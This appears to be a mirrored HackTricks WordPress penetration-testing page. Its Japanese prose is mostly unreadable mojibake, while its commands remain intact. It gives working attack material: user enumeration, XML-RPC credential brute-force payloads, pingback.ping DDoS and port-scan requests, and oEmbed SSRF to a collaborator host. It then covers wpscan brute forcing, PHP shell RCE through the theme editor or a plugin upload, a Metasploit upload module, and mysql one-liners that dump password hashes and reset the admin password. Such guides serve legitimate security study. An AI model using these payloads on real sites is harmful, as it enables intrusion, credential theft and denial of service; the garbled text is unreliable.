27 KiB
Wordpress
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- ãµã€ããŒã»ãã¥ãªãã£äŒç€Ÿã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ã«ã¢ã¯ã»ã¹ããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
- The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
- å ¬åŒã®PEASSïŒHackTricks swagãæã«å ¥ããŸãããã
- ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ãã©ããŒããŠãã ããðŠ@carlospolopmã
- ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãPRã hacktricks repo ãš hacktricks-cloud repo ã«æåºããŠãã ããã
![](/Mirrors/hacktricks/media/commit/b2da93ebaf38ff64f3f835456764d392e2ec19dc/.gitbook/assets/image%20%283%29%20%281%29%20%281%29.png)
Trickestã䜿çšããŠãäžçã§æãé«åºŠãªã³ãã¥ããã£ããŒã«ã«ãã£ãŠåŒ·åãããã¯ãŒã¯ãããŒãç°¡åã«æ§ç¯ããã³èªååããŸãã
ä»ããã¢ã¯ã»ã¹ãååŸïŒ
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
åºæ¬æ å ±
ã¢ããããŒãããããã¡ã€ã«ã¯æ¬¡ã®å Žæã«ä¿åãããŸãïŒhttp://10.10.10.10/wp-content/uploads/2018/08/a.txt
ããŒããã¡ã€ã«ã¯/wp-content/themes/ã«ãããŸãã®ã§ãããŒãã®phpãå€æŽããŠRCEãååŸããå Žåã¯ããããããã®ãã¹ã䜿çšããããšã«ãªããŸããäŸãã°ïŒtwentytwelveããŒãã䜿çšããŠã次ã®å Žæã«ãã404.phpãã¡ã€ã«ã«ã¢ã¯ã»ã¹ã§ããŸãïŒ/wp-content/themes/twentytwelve/404.php
å¥ã®æçšãªURLã¯æ¬¡ã®ãšããã§ãïŒ/wp-content/themes/default/404.php
wp-config.phpã«ã¯ãããŒã¿ããŒã¹ã®ã«ãŒããã¹ã¯ãŒããèšèŒãããŠããŸãã
ãã§ãã¯ããããã©ã«ãã®ãã°ã€ã³ãã¹ïŒ/wp-login.phpã/wp-login/ã/wp-admin/ã/wp-admin.phpã/login/
ã¡ã€ã³ã®WordPressãã¡ã€ã«
index.php
license.txt
ã«ã¯ãã€ã³ã¹ããŒã«ãããŠããWordPressã®ããŒãžã§ã³ãªã©ãæçšãªæ å ±ãå«ãŸããŠããŸããwp-activate.php
ã¯ãæ°ããWordPressãµã€ãã®èšå®æã«ã¡ãŒã«ã¢ã¯ãã£ããŒã·ã§ã³ããã»ã¹ã«äœ¿çšãããŸãã- ãã°ã€ã³ãã©ã«ãïŒé衚瀺ã«ããããã«ååãå€æŽãããŠããå ŽåããããŸãïŒïŒ
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
ã¯ãWordPressã®æ©èœãè¡šããã¡ã€ã«ã§ãHTTPããã©ã³ã¹ããŒãã¡ã«ããºã ãšããŠãXMLããšã³ã³ãŒãã£ã³ã°ã¡ã«ããºã ãšããŠäœ¿çšããŠããŒã¿ãéä¿¡ããããšãã§ããŸãããã®ã¿ã€ãã®éä¿¡ã¯ãWordPressã®REST APIã«ãã£ãŠçœ®ãæããããŸãããwp-content
ãã©ã«ãã¯ããã©ã°ã€ã³ãšããŒããä¿åãããã¡ã€ã³ãã£ã¬ã¯ããªã§ããwp-content/uploads/
ã¯ããã©ãããã©ãŒã ã«ã¢ããããŒãããããã¡ã€ã«ãä¿åããããã£ã¬ã¯ããªã§ããwp-includes/
ã¯ã蚌ææžããã©ã³ããJavaScriptãã¡ã€ã«ããŠã£ãžã§ãããªã©ã®ã³ã¢ãã¡ã€ã«ãä¿åããããã£ã¬ã¯ããªã§ãã
ãã¹ããšã¯ã¹ããã€ããŒã·ã§ã³
wp-config.php
ãã¡ã€ã«ã«ã¯ãWordPressãããŒã¿ããŒã¹ã«æ¥ç¶ããããã«å¿ èŠãªæ å ±ãå«ãŸããŠããŸããããŒã¿ããŒã¹åãããŒã¿ããŒã¹ãã¹ãããŠãŒã¶ãŒåãšãã¹ã¯ãŒããèªèšŒããŒãšãœã«ããããŒã¿ããŒã¹ããŒãã«ã®æ¥é èŸãªã©ã§ãããã®èšå®ãã¡ã€ã«ã¯ããã©ãã«ã·ã¥ãŒãã£ã³ã°ã«åœ¹ç«ã€DEBUGã¢ãŒããã¢ã¯ãã£ãã«ããããã«ã䜿çšã§ããŸãã
ãŠãŒã¶ãŒã®æš©é
- 管çè
- ãšãã£ã¿ãŒïŒèªåèªèº«ãšä»ã®æçš¿ãå ¬éããã³ç®¡çããŸãã
- èè ïŒèªåèªèº«ã®æçš¿ãå ¬éããã³ç®¡çããŸãã
- å¯çš¿è ïŒèªåã®æçš¿ãæžããŠç®¡çããŸãããå ¬éããããšã¯ã§ããŸããã
- 賌èªè ïŒæçš¿ãé²èŠ§ãããããã£ãŒã«ãç·šéããŸãã
ããã·ããšãã¡ã¬ãŒã·ã§ã³
WordPressã®ããŒãžã§ã³ãååŸãã
/license.txt
ãŸãã¯/readme.html
ã®ãã¡ã€ã«ãèŠã€ããããšãã§ãããã©ããã確èªããŸãã
ããŒãžã®ãœãŒã¹ã³ãŒãå ïŒäŸïŒhttps://wordpress.org/support/article/pages/ããã®äŸïŒïŒ
- grep
curl https://victim.com/ | grep 'content="WordPress'
meta name
- CSS link files
- JavaScript files
ãã©ã°ã€ã³ãååŸãã
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
ããŒãã®ååŸ
WordPressã§ã¯ãããŒãã¯ãŠã§ããµã€ãã®å€èŠ³ãã¬ã€ã¢ãŠããã«ã¹ã¿ãã€ãºããããã«äœ¿çšãããŸããããŒãã¯éåžžãWordPressã®å ¬åŒããŒããã£ã¬ã¯ããªãããŒãããŒã±ãããã¬ã€ã¹ããå ¥æã§ããŸãã
以äžã®æé ã«åŸã£ãŠãWordPressã§ããŒããååŸããããšãã§ããŸãã
- WordPressã®ç®¡çç»é¢ã«ãã°ã€ã³ããŸãã
- ãå€èŠ³ãã¡ãã¥ãŒãããããŒãããéžæããŸãã
- ãæ°èŠè¿œå ããã¿ã³ãã¯ãªãã¯ããŸãã
- ããŒãã®äžèŠ§ã衚瀺ãããŸãã®ã§ãèå³ã®ããããŒããéžæããŸãã
- ããŒãã®è©³çŽ°ããŒãžã§ãããã¬ãã¥ãŒããã¿ã³ãã¯ãªãã¯ããŠãããŒãã®å€èŠ³ã確èªããŸãã
- ããŒããã€ã³ã¹ããŒã«ããå Žåã¯ããã€ã³ã¹ããŒã«ããã¿ã³ãã¯ãªãã¯ããŸãã
- ã€ã³ã¹ããŒã«ãå®äºãããããæå¹åããã¿ã³ãã¯ãªãã¯ããŠãããŒããæå¹ã«ããŸãã
ããã§ãWordPressã§æ°ããããŒããååŸããŠå©çšããããšãã§ããŸãã
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
äžè¬çãªããŒãžã§ã³ã®æœåº
WordPressã®ããŒãžã§ã³ãç¹å®ããããã«ãããã€ãã®æ¹æ³ããããŸãã
-
ã¡ã¿ããŒã¿ã®ç¢ºèª: WordPressã®ããŒãžã§ã³ã¯ãHTMLã®ã¡ã¿ããŒã¿å ã«èšèŒãããŠããããšããããŸãããŠã§ãããŒãžã®ãœãŒã¹ã³ãŒãã衚瀺ãã
<meta name="generator" content="WordPress x.x.x" />
ãšããè¡ãæ¢ããŸããx.x.x
ã¯WordPressã®ããŒãžã§ã³çªå·ã§ãã -
ãªãŒãããŒã®ç¢ºèª: WordPressã®ããŒãžã§ã³ã¯ããŠã§ããµã€ãã®ã«ãŒããã£ã¬ã¯ããªã«ãã
readme.html
ãã¡ã€ã«ã«ãèšèŒãããŠããŸãããã®ãã¡ã€ã«ã衚瀺ããããŒãžã§ã³çªå·ã確èªããŸãã -
ãã£ã¬ã¯ããªåã®ç¢ºèª: WordPressã®ããŒãžã§ã³ã¯ãã€ã³ã¹ããŒã«ããããã£ã¬ã¯ããªåã«ãå«ãŸããŠããå ŽåããããŸãããŠã§ããµã€ãã®URLã確èªãã
/wp-content/themes/
ãŸãã¯/wp-content/plugins/
ã®åŸã«ç¶ããã£ã¬ã¯ããªåã«ããŒãžã§ã³çªå·ãå«ãŸããŠããã確èªããŸãã
ãããã®æ¹æ³ã䜿çšããŠãWordPressã®ããŒãžã§ã³ãç¹å®ããããšãã§ããŸãã
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
![](/Mirrors/hacktricks/media/commit/b2da93ebaf38ff64f3f835456764d392e2ec19dc/.gitbook/assets/image%20%283%29%20%281%29%20%281%29.png)
Trickestã䜿çšããŠãäžçã§æãé«åºŠãªã³ãã¥ããã£ããŒã«ã«ãã£ãŠåŒ·åãããã¯ãŒã¯ãããŒãç°¡åã«æ§ç¯ããèªååããããšãã§ããŸãã
ä»ããã¢ã¯ã»ã¹ãååŸïŒ
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
ã¢ã¯ãã£ããªåæ
ãã©ã°ã€ã³ãšããŒã
ããããããã¹ãŠã®ãã©ã°ã€ã³ãšããŒããèŠã€ããããšã¯ã§ããŸããããã¹ãŠãçºèŠããã«ã¯ããã©ã°ã€ã³ãšããŒãã®ãªã¹ããã¢ã¯ãã£ãã«ãã«ãŒããã©ãŒã¹ããå¿ èŠããããŸãïŒå¹žããªããšã«ããã®ãªã¹ããå«ãèªååããŒã«ããããŸãïŒã
ãŠãŒã¶ãŒ
IDãã«ãŒã
WordPressãµã€ãããæå¹ãªãŠãŒã¶ãŒãååŸããã«ã¯ããŠãŒã¶ãŒIDããã«ãŒããã©ãŒã¹ããŸãïŒ
curl -s -I -X GET http://blog.example.com/?author=1
ããã¬ã¹ãã³ã¹ã200ãŸãã¯30Xã§ããã°ãããã¯idãæå¹ã§ããããšãæå³ããŸããããã¬ã¹ãã³ã¹ã400ã§ããã°ãidã¯ç¡å¹ã§ãã
wp-json
ãŸãããŠãŒã¶ãŒã«é¢ããæ å ±ãååŸããããã«ã以äžã®ããã«ã¯ãšãªãè©Šãããšãã§ããŸãã
curl http://blog.example.com/wp-json/wp/v2/users
ãã®æ©èœãæå¹ã«ããŠãããŠãŒã¶ãŒã«é¢ããæ å ±ã®ã¿æäŸãããŸãã
ãŸãã/wp-json/wp/v2/pagesã¯IPã¢ãã¬ã¹ãæŒæŽ©ããå¯èœæ§ããããŸãã
ãã°ã€ã³ãŠãŒã¶ãŒåã®åæ
/wp-login.php
ã«ãã°ã€ã³ããéãã¡ãã»ãŒãžã¯ãæå®ããããŠãŒã¶ãŒåãååšãããã©ããã«ãã£ãŠç°ãªããŸãã
XML-RPC
xml-rpc.php
ãã¢ã¯ãã£ããªå Žåãè³æ Œæ
å ±ã®ç·åœããæ»æãå®è¡ããããä»ã®ãªãœãŒã¹ãžã®DoSæ»æã«äœ¿çšããããšãã§ããŸãïŒããšãã°ããã¡ãã䜿çšããŠãã®ããã»ã¹ãèªååããããšãã§ããŸãïŒã
ã¢ã¯ãã£ããã©ããã確èªããã«ã¯ã_/xmlrpc.php_ã«ã¢ã¯ã»ã¹ãã次ã®ãªã¯ãšã¹ããéä¿¡ããŠãã ããïŒ
ãã§ãã¯
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
è³æ Œæ å ±ã®ãã«ãŒããã©ãŒã¹æ»æ
wp.getUserBlogs
ãwp.getCategories
ããŸãã¯**metaWeblog.getUsersBlogs
**ã¯ãè³æ Œæ
å ±ã®ãã«ãŒããã©ãŒã¹æ»æã«äœ¿çšã§ããããã€ãã®ã¡ãœããã§ãããããã®ãããããèŠã€ããããšãã§ããã°ã次ã®ãããªãã®ãéä¿¡ããããšãã§ããŸãã
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
æ£ãããŠãŒã¶ãŒåãšãã¹ã¯ãŒãã䜿çšããªãå Žåã200ã³ãŒãã®ã¬ã¹ãã³ã¹å ã«ã¯ããŠãŒã¶ãŒåãŸãã¯ãã¹ã¯ãŒããæ£ãããããŸããããšããã¡ãã»ãŒãžã衚瀺ãããŸãã
æ£ããè³æ Œæ å ±ã䜿çšãããšããã¡ã€ã«ãã¢ããããŒãããããšãã§ããŸããã¬ã¹ãã³ã¹ã«ã¯ãã¹ã衚瀺ãããŸã (https://gist.github.com/georgestephanis/5681982)ã
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
ãŸããåããªã¯ãšã¹ãã§è€æ°ã®è³æ Œæ
å ±ãè©Šãããšãã§ãããããsystem.multicall
ã䜿çšããŠè³æ Œæ
å ±ã®ãã«ãŒããã©ãŒã¹æ»æãè¡ãããéãæ¹æ³ããããŸãã
![](/Mirrors/hacktricks/media/commit/b2da93ebaf38ff64f3f835456764d392e2ec19dc/.gitbook/assets/image%20%28188%29.png)
2FAã®ãã€ãã¹
ãã®æ¹æ³ã¯ããã°ã©ã åãã§ããã人éåãã§ã¯ãªããå€ããã2FAããµããŒãããŠããŸããããããã£ãŠãæå¹ãªè³æ Œæ å ±ãæã£ãŠããããã¡ã€ã³ã®å ¥ãå£ã2FAã§ä¿è·ãããŠããå Žåãxmlrpc.phpãæªçšããŠ2FAããã€ãã¹ããŠãã°ã€ã³ããããšãã§ãããããããŸããããã ããã³ã³ãœãŒã«ãä»ããŠè¡ãããã¹ãŠã®ã¢ã¯ã·ã§ã³ãå®è¡ããããšã¯ã§ããŸããããIppsecãhttps://www.youtube.com/watch?v=p8mIdm93mfw&t=1130sã§èª¬æããŠããããã«ããŸã RCEã«å°éããããšãã§ãããããããŸããã
DDoSãŸãã¯ããŒãã¹ãã£ã³
ãªã¹ãå ã«_pingback.ping_ã¡ãœãããèŠã€ããããšãã§ããã°ãWordpressã«ä»»æã®ãã¹ã/ããŒãã«å¯ŸããŠãªã¯ãšã¹ããéä¿¡ãããããšãã§ããŸããããã䜿çšããŠãWordpressã®æ°åã®ãµã€ãã«ç¹å®ã®å ŽæïŒãããã£ãŠããã®å Žæã§DDoSãçºçããïŒãžã®ã¢ã¯ã»ã¹ãèŠæ±ããããšãã§ããŸãããŸãã¯ãWordpressã«å éšã®ãããã¯ãŒã¯ãã¹ãã£ã³ãããããšãã§ããŸãïŒä»»æã®ããŒããæå®ã§ããŸãïŒã
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
ããfaultCodeã®å€ã0ããã倧ããïŒ17ïŒå Žåãããã¯ããŒããéããŠããããšãæå³ããŸãã
**system.multicall
**ã®äœ¿çšæ¹æ³ãåã®ã»ã¯ã·ã§ã³ã§ç¢ºèªããŠããã®ã¡ãœãããä¹±çšããŠDDoSæ»æãåŒãèµ·ããæ¹æ³ãåŠãã§ãã ããã
DDoS
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
wp-cron.php DoS
ãã®ãã¡ã€ã«ã¯éåžžãWordpressãµã€ãã®ã«ãŒãã«ååšããŸãïŒ/wp-cron.php
ãã®ãã¡ã€ã«ã«ã¢ã¯ã»ã¹ãããšãéãMySQL ã¯ãšãªãå®è¡ããããããæ»æè
ã¯ããã䜿çšããŠDoSãåŒãèµ·ããããšãã§ããŸãã
ãŸããããã©ã«ãã§ã¯ãwp-cron.php
ã¯ãã¹ãŠã®ããŒãžããŒãïŒã¯ã©ã€ã¢ã³ããWordpressã®ä»»æã®ããŒãžããªã¯ãšã¹ããããã³ã«ïŒã§åŒã³åºããããããé«ãã©ãã£ãã¯ã®ãµã€ãã§ã¯åé¡ãåŒãèµ·ããå¯èœæ§ããããŸãïŒDoSïŒã
Wp-Cronãç¡å¹ã«ãããã¹ãå ã«å¿ èŠãªã¢ã¯ã·ã§ã³ãå®æçã«å®è¡ããå®éã®cronjobãäœæããããšãæšå¥šãããŠããŸãïŒåé¡ãåŒãèµ·ãããã«ïŒã
/wp-json/oembed/1.0/proxy - SSRF
https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net ã«ã¢ã¯ã»ã¹ããŠãWordpressãµã€ãããªã¯ãšã¹ããè¡ãå¯èœæ§ããããŸãã
ããã¯æ©èœããªãå Žåã®å¿çã§ãïŒ
SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
ãã®ããŒã«ã¯ãmethodName: pingback.ping ãšãã¹ /wp-json/oembed/1.0/proxy ã®ååšããã§ãã¯ããååšããå Žåã¯ããããæªçšããããšããŸãã
èªåããŒã«
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
![](/Mirrors/hacktricks/media/commit/b2da93ebaf38ff64f3f835456764d392e2ec19dc/.gitbook/assets/image%20%283%29%20%281%29%20%281%29.png)
Trickestã䜿çšããŠãäžçã§æãé«åºŠãªã³ãã¥ããã£ããŒã«ã«ãã£ãŠåŒ·åãããã¯ãŒã¯ãããŒãç°¡åã«æ§ç¯ããèªååããããšãã§ããŸãã
ä»ããã¢ã¯ã»ã¹ãååŸããŠãã ããïŒ
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
ããããäžæžãããŠã¢ã¯ã»ã¹ãååŸãã
ããã¯å®éã®æ»æã§ã¯ãªããåãªãèå³ã§ããCTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-manã§ã¯ãä»»æã®WordPressãã¡ã€ã«ã®1ããããå転ãããããšãã§ããŸãããããã£ãŠããã¡ã€ã«/var/www/html/wp-includes/user.php
ã®äœçœ®5389
ãå転ãããŠãNOTïŒ!
ïŒæäœãNOPåããããšãã§ããŸãã
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
ããã«RCE
䜿çšãããŠããããŒãã®phpãå€æŽããïŒç®¡çè ã®è³æ Œæ å ±ãå¿ èŠïŒ
å€èŠ³ â ããŒããšãã£ã¿ãŒ â 404ãã³ãã¬ãŒãïŒå³åŽïŒ
phpã·ã§ã«ã®å 容ãå€æŽããŸãïŒ
ã€ã³ã¿ãŒãããã§æŽæ°ãããããŒãžã«ã¢ã¯ã»ã¹ããæ¹æ³ãæ€çŽ¢ããŸãããã®å Žåãããã«ã¢ã¯ã»ã¹ããå¿ èŠããããŸãïŒhttp://10.11.1.234/wp-content/themes/twentytwelve/404.php
MSF
次ã®ã³ãã³ãã䜿çšã§ããŸãïŒ
use exploit/unix/webapp/wp_admin_shell_upload
ãã©ã°ã€ã³RCE
PHPãã©ã°ã€ã³
ãã©ã°ã€ã³ãšããŠ.phpãã¡ã€ã«ãã¢ããããŒãããããšãå¯èœãããããŸããã
äŸãã°ã次ã®ããã«ããŠPHPããã¯ãã¢ãäœæããŸãïŒ
次ã«ãæ°ãããã©ã°ã€ã³ãè¿œå ããŸãïŒ
ãã©ã°ã€ã³ãã¢ããããŒãããŠããä»ããã€ã³ã¹ããŒã«ããæŒããŸãïŒ
ãç¶è¡ããã¯ãªãã¯ããŸãïŒ
ãããããããã¯äœãèµ·ãããªãããã«èŠããŸãããã¡ãã£ã¢ã«ç§»åãããšãã¢ããããŒããããã·ã§ã«ã衚瀺ãããŸãïŒ
ããã«ã¢ã¯ã»ã¹ãããšãéã·ã§ã«ãå®è¡ããããã®URLã衚瀺ãããŸãïŒ
æªæã®ãããã©ã°ã€ã³ã®ã¢ããããŒããšæå¹å
(ãã®éšå㯠https://www.hackingarticles.in/wordpress-reverse-shell/ããã³ããŒãããŠããŸã)
WordPressã®ããã·ã¥ããŒãã«ã¢ã¯ã»ã¹ã§ããå Žåãæªæã®ãããã©ã°ã€ã³ãã€ã³ã¹ããŒã«ããããšãã§ããŸããããã§ã¯ãæ¢ã«è匱ãªãã©ã°ã€ã³ãexploit dbããããŠã³ããŒãããŸããã
ç·Žç¿çšã®ãã©ã°ã€ã³ãããŠã³ããŒãããã«ã¯ããããã¯ãªãã¯ããŠãã ããã
ãã©ã°ã€ã³ã®zipãã¡ã€ã«ãããã®ã§ããã©ã°ã€ã³ãã¢ããããŒãããŸãã
ããã·ã¥ããŒã > ãã©ã°ã€ã³ > ãã©ã°ã€ã³ãã¢ããããŒã
ããŠã³ããŒãããzipãã¡ã€ã«ãåç §ããŸãã
ããã±ãŒãžãæ£åžžã«ã€ã³ã¹ããŒã«ããããããã©ã°ã€ã³ãæå¹åããå¿ èŠããããŸãã
ãã¹ãŠãããŸãèšå®ãããŠããå Žåã¯ãæ»æãéå§ããŸããè匱ãªãã©ã°ã€ã³ãreflex-galleryããã€ã³ã¹ããŒã«ãããŠãããããç°¡åã«exploitã§ããŸãã
ãã®è匱æ§ã®exploitã¯Metasploitãã¬ãŒã ã¯ãŒã¯å ã«ãããŸãã®ã§ã以äžã®ã¢ãžã¥ãŒã«ãããŒããã次ã®ã³ãã³ããå®è¡ããŸãïŒ
äžèšã®ã³ãã³ããå®è¡ããããšãmeterpreterã»ãã·ã§ã³ã確ç«ãããŸãããã®èšäºã§èª¬æãããŠããããã«ãWordPressãã©ãããã©ãŒã ã®ãŠã§ããµã€ããexploitããããã®è€æ°ã®æ¹æ³ããããŸãã
ãã¹ããšã¯ã¹ããã€ããŒã·ã§ã³
ãŠãŒã¶ãŒåãšãã¹ã¯ãŒããæœåºããŸãïŒ
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
管çè ãã¹ã¯ãŒãã®å€æŽæ¹æ³:
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
WordPressã®ä¿è·
å®æçãªæŽæ°
WordPressããã©ã°ã€ã³ãããŒããææ°ã§ããããšã確èªããŠãã ããããŸããwp-config.phpã§èªåæŽæ°ãæå¹ã«ãªã£ãŠããããšã確èªããŠãã ããã
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
ãŸããä¿¡é Œã§ããWordPressã®ãã©ã°ã€ã³ãšããŒãã®ã¿ãã€ã³ã¹ããŒã«ããŠãã ããã
ã»ãã¥ãªãã£ãã©ã°ã€ã³
ãã®ä»ã®æšå¥šäºé
- ããã©ã«ãã®adminãŠãŒã¶ãŒãåé€ãã
- 匷åãªãã¹ã¯ãŒããš2èŠçŽ èªèšŒã䜿çšãã
- å®æçã«ãŠãŒã¶ãŒã®æš©éã確èªãã
- ãã«ãŒããã©ãŒã¹æ»æãé²ãããã«ããã°ã€ã³è©Šè¡åæ°ãå¶éãã
- **
wp-admin.php
**ãã¡ã€ã«ã®ååãå€æŽããå éšããã®ã¢ã¯ã»ã¹ãŸãã¯ç¹å®ã®IPã¢ãã¬ã¹ããã®ã¿ã¢ã¯ã»ã¹ãèš±å¯ããã
![](/Mirrors/hacktricks/media/commit/b2da93ebaf38ff64f3f835456764d392e2ec19dc/.gitbook/assets/image%20%283%29%20%281%29%20%281%29.png)
Trickestã䜿çšããŠãäžçã§æãé«åºŠãªã³ãã¥ããã£ããŒã«ã«ãã£ãŠåŒ·åãããã¯ãŒã¯ãããŒãç°¡åã«æ§ç¯ããã³èªååããŸãã
ä»ããã¢ã¯ã»ã¹ãååŸïŒ
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå ¥æãããã§ããïŒãŸãã¯ãHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
- The PEASS FamilyãçºèŠããŸããããç§ãã¡ã®ç¬å çãªNFTã³ã¬ã¯ã·ã§ã³
- å ¬åŒã®PEASSïŒHackTricksã°ããºãæã«å ¥ããŸããã
- ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ç§ããã©ããŒããŠãã ããðŠ@carlospolopm.
- ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãPRã hacktricks repo ããã³ hacktricks-cloud repo ã«æåºããŠãã ããã